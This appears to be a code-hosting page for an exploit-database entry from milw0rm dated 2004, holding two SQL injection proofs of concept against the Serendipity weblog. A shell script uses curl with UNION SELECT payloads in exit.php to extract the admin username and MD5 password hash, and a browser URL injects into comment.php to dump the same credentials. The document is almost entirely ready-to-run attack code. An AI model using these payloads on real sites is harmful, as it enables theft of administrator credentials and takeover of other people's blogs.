PageRenderTime 52ms CodeModel.GetById 25ms RepoModel.GetById 1ms app.codeStats 0ms

/exploits/php/webapps/561.sh

https://bitbucket.org/DinoRex99/exploit-database
Shell | 32 lines | 16 code | 14 blank | 2 comment | 0 complexity | 0d6d0d8a8c1b362f877cafcf88ab0c0a MD5 | raw file
Possible License(s): GPL-2.0
  1. Proof of Concept 1
  2. ------------------
  3. Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog
  4. ser_sqli_poc.sh
  5. ---------8<-----------8<-------------
  6. #!/bin/sh
  7. echo -n "Username: "
  8. curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1"
  9. | grep Location | cut -b10-
  10. echo -n "MD5(password): "
  11. curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1"
  12. | grep Location | cut -b10-
  13. ---------8<-----------8<-------------
  14. Proof of Concept 2
  15. ------------------
  16. Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.
  17. http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*
  18. # milw0rm.com [2004-09-28]